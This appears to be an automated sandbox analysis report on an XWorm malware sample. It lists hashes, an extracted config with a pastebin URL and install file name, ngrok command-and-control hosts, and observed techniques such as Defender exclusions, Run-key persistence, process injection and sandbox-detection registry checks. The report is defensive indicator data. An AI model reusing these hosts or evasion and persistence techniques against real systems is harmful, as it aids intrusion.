Resubmissions
21-11-2024 20:20
241121-y4nlrs1nar 10Analysis
-
max time kernel
150s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
21-11-2024 20:20
Static task
static1
Behavioral task
behavioral1
Sample
1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.exe
Resource
win7-20240903-en
General
-
Target
1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.exe
-
Size
5.8MB
-
MD5
6192ed4726e46be98934d1e4ebebb7e3
-
SHA1
df8badbe186b9ca3cd88bc4014a3a4aac8ac1736
-
SHA256
1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc
-
SHA512
b7a8f9cc0d3f214272e3b51bc02f14db11d5c2c1bb0177c31a8dca7fd1f1fa1e08aa6ec6c9b9de652455fc5fbe3abb939d0c591cece2e075adbe963fb6ca0969
-
SSDEEP
98304:0wREfWuXTo8ToIebV6oHFE9xI6ohWhPSwVrGiGfm8EOuq2NmF:MfWW8uGY9xVoY9zELHPuqimF
Malware Config
Extracted
xworm
0LLXgeoJ4l4QFpG6
-
install_file
USBDriver.exe
-
pastebin_url
https://pastebin.com/raw/FrUYqTuA
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral2/memory/824-77-0x000000001DD90000-0x000000001DDA4000-memory.dmp family_xworm -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target PID 4400 created 612 4400 powershell.EXE 5 PID 4988 created 612 4988 powershell.EXE 5 -
Xworm family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4300 powershell.exe 1200 powershell.exe 4876 powershell.exe 2000 powershell.exe 972 powershell.exe 4400 powershell.EXE 4988 powershell.EXE -
Creates new service(s) 2 TTPs
-
Sets service image path in registry 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\dosvc\ImagePath = "C:\\Windows\\System32\\svchost.exe -k NetworkService -p" WaaSMedicAgent.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\UsoSvc\ImagePath = "C:\\Windows\\system32\\svchost.exe -k netsvcs -p" WaaSMedicAgent.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation 1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.tmp Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation RuntimeBroker.exe -
Executes dropped EXE 9 IoCs
pid Process 1116 1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.tmp 2968 1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.tmp 1436 planet.exe 4608 RuntimeBroker.exe 824 RuntimeBroker.exe 908 RuntimeBroker.exe 4320 zrtdwpgwlkoj.exe 1276 RuntimeBroker.exe 4416 RuntimeBroker.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "C:\\Windows\\RuntimeBroker.exe" 1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.tmp Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "C:\\Windows\\RuntimeBroker.exe" 1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.tmp -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs
flow ioc 24 4.tcp.eu.ngrok.io 36 pastebin.com 46 4.tcp.eu.ngrok.io 63 4.tcp.eu.ngrok.io 69 4.tcp.eu.ngrok.io 14 pastebin.com 15 pastebin.com 16 4.tcp.eu.ngrok.io -
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 3844 powercfg.exe 4380 powercfg.exe 3572 powercfg.exe 4368 powercfg.exe 4460 powercfg.exe 4040 powercfg.exe 2336 powercfg.exe 2388 powercfg.exe -
Drops file in System32 directory 18 IoCs
description ioc Process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A OfficeClickToRun.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\system32\MRT.exe zrtdwpgwlkoj.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A OfficeClickToRun.exe File opened for modification C:\Windows\system32\MRT.exe planet.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\WindowsUpdate\Scheduled Start svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File opened for modification C:\Windows\System32\Tasks\dialersvc64 svchost.exe -
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target PID 1436 set thread context of 4768 1436 planet.exe 120 PID 4400 set thread context of 3088 4400 powershell.EXE 140 PID 4320 set thread context of 4452 4320 zrtdwpgwlkoj.exe 158 PID 4320 set thread context of 4728 4320 zrtdwpgwlkoj.exe 162 PID 4320 set thread context of 3572 4320 zrtdwpgwlkoj.exe 164 PID 4988 set thread context of 4608 4988 powershell.EXE 167 -
Drops file in Windows directory 8 IoCs
description ioc Process File created C:\Windows\is-OQ09T.tmp 1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.tmp File created C:\Windows\is-ONBEH.tmp 1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.tmp File opened for modification C:\Windows\unins000.dat 1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.tmp File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe File opened for modification C:\Windows\planet.exe 1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.tmp File opened for modification C:\Windows\RuntimeBroker.exe 1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.tmp File created C:\Windows\unins000.dat 1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.tmp File created C:\Windows\is-NLRLL.tmp 1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.tmp -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4328 sc.exe 5024 sc.exe 2964 sc.exe 1660 sc.exe 4368 sc.exe 3200 sc.exe 3028 sc.exe 3656 sc.exe 832 sc.exe 3444 sc.exe 4452 sc.exe 1680 sc.exe 3224 sc.exe 1376 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.tmp -
Checks SCSI registry key(s) 3 TTPs 18 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID wmiprvse.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier wmiprvse.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1732220533" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs dialer.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={190ECAB3-FDB0-48D9-90A2-083C27695B48}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs dialer.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3124 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 824 RuntimeBroker.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2968 1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.tmp 2968 1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.tmp 4300 powershell.exe 4300 powershell.exe 1200 powershell.exe 1200 powershell.exe 4876 powershell.exe 4876 powershell.exe 1436 planet.exe 2000 powershell.exe 2000 powershell.exe 1436 planet.exe 1436 planet.exe 1436 planet.exe 1436 planet.exe 1436 planet.exe 1436 planet.exe 1436 planet.exe 1436 planet.exe 1436 planet.exe 1436 planet.exe 1436 planet.exe 1436 planet.exe 1436 planet.exe 1436 planet.exe 1436 planet.exe 4320 zrtdwpgwlkoj.exe 4400 powershell.EXE 972 powershell.exe 972 powershell.exe 4400 powershell.EXE 4400 powershell.EXE 3088 dllhost.exe 3088 dllhost.exe 3088 dllhost.exe 3088 dllhost.exe 4320 zrtdwpgwlkoj.exe 4320 zrtdwpgwlkoj.exe 4320 zrtdwpgwlkoj.exe 4320 zrtdwpgwlkoj.exe 4320 zrtdwpgwlkoj.exe 4320 zrtdwpgwlkoj.exe 4320 zrtdwpgwlkoj.exe 4320 zrtdwpgwlkoj.exe 4320 zrtdwpgwlkoj.exe 4320 zrtdwpgwlkoj.exe 4320 zrtdwpgwlkoj.exe 4320 zrtdwpgwlkoj.exe 4320 zrtdwpgwlkoj.exe 4988 powershell.EXE 3088 dllhost.exe 3088 dllhost.exe 4988 powershell.EXE 3088 dllhost.exe 3088 dllhost.exe 3088 dllhost.exe 3088 dllhost.exe 3088 dllhost.exe 3088 dllhost.exe 3088 dllhost.exe 3088 dllhost.exe 4988 powershell.EXE 3088 dllhost.exe 3088 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4608 RuntimeBroker.exe Token: SeDebugPrivilege 824 RuntimeBroker.exe Token: SeDebugPrivilege 4300 powershell.exe Token: SeDebugPrivilege 1200 powershell.exe Token: SeDebugPrivilege 4876 powershell.exe Token: SeDebugPrivilege 908 RuntimeBroker.exe Token: SeDebugPrivilege 2000 powershell.exe Token: SeShutdownPrivilege 4380 powercfg.exe Token: SeCreatePagefilePrivilege 4380 powercfg.exe Token: SeShutdownPrivilege 4460 powercfg.exe Token: SeCreatePagefilePrivilege 4460 powercfg.exe Token: SeShutdownPrivilege 3572 powercfg.exe Token: SeCreatePagefilePrivilege 3572 powercfg.exe Token: SeShutdownPrivilege 4368 powercfg.exe Token: SeCreatePagefilePrivilege 4368 powercfg.exe Token: SeDebugPrivilege 4400 powershell.EXE Token: SeDebugPrivilege 972 powershell.exe Token: SeDebugPrivilege 4400 powershell.EXE Token: SeDebugPrivilege 3088 dllhost.exe Token: SeShutdownPrivilege 2388 powercfg.exe Token: SeCreatePagefilePrivilege 2388 powercfg.exe Token: SeShutdownPrivilege 4040 powercfg.exe Token: SeCreatePagefilePrivilege 4040 powercfg.exe Token: SeShutdownPrivilege 2336 powercfg.exe Token: SeCreatePagefilePrivilege 2336 powercfg.exe Token: SeShutdownPrivilege 3844 powercfg.exe Token: SeCreatePagefilePrivilege 3844 powercfg.exe Token: SeLockMemoryPrivilege 3572 dialer.exe Token: SeDebugPrivilege 4988 powershell.EXE Token: SeAssignPrimaryTokenPrivilege 2284 svchost.exe Token: SeIncreaseQuotaPrivilege 2284 svchost.exe Token: SeSecurityPrivilege 2284 svchost.exe Token: SeTakeOwnershipPrivilege 2284 svchost.exe Token: SeLoadDriverPrivilege 2284 svchost.exe Token: SeSystemtimePrivilege 2284 svchost.exe Token: SeBackupPrivilege 2284 svchost.exe Token: SeRestorePrivilege 2284 svchost.exe Token: SeShutdownPrivilege 2284 svchost.exe Token: SeSystemEnvironmentPrivilege 2284 svchost.exe Token: SeUndockPrivilege 2284 svchost.exe Token: SeManageVolumePrivilege 2284 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2284 svchost.exe Token: SeIncreaseQuotaPrivilege 2284 svchost.exe Token: SeSecurityPrivilege 2284 svchost.exe Token: SeTakeOwnershipPrivilege 2284 svchost.exe Token: SeLoadDriverPrivilege 2284 svchost.exe Token: SeSystemtimePrivilege 2284 svchost.exe Token: SeBackupPrivilege 2284 svchost.exe Token: SeRestorePrivilege 2284 svchost.exe Token: SeShutdownPrivilege 2284 svchost.exe Token: SeSystemEnvironmentPrivilege 2284 svchost.exe Token: SeUndockPrivilege 2284 svchost.exe Token: SeManageVolumePrivilege 2284 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2284 svchost.exe Token: SeIncreaseQuotaPrivilege 2284 svchost.exe Token: SeSecurityPrivilege 2284 svchost.exe Token: SeTakeOwnershipPrivilege 2284 svchost.exe Token: SeLoadDriverPrivilege 2284 svchost.exe Token: SeSystemtimePrivilege 2284 svchost.exe Token: SeBackupPrivilege 2284 svchost.exe Token: SeRestorePrivilege 2284 svchost.exe Token: SeShutdownPrivilege 2284 svchost.exe Token: SeSystemEnvironmentPrivilege 2284 svchost.exe Token: SeUndockPrivilege 2284 svchost.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 2968 1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.tmp -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4964 wrote to memory of 1116 4964 1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.exe 82 PID 4964 wrote to memory of 1116 4964 1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.exe 82 PID 4964 wrote to memory of 1116 4964 1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.exe 82 PID 1116 wrote to memory of 4600 1116 1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.tmp 83 PID 1116 wrote to memory of 4600 1116 1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.tmp 83 PID 1116 wrote to memory of 4600 1116 1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.tmp 83 PID 4600 wrote to memory of 2968 4600 1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.exe 84 PID 4600 wrote to memory of 2968 4600 1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.exe 84 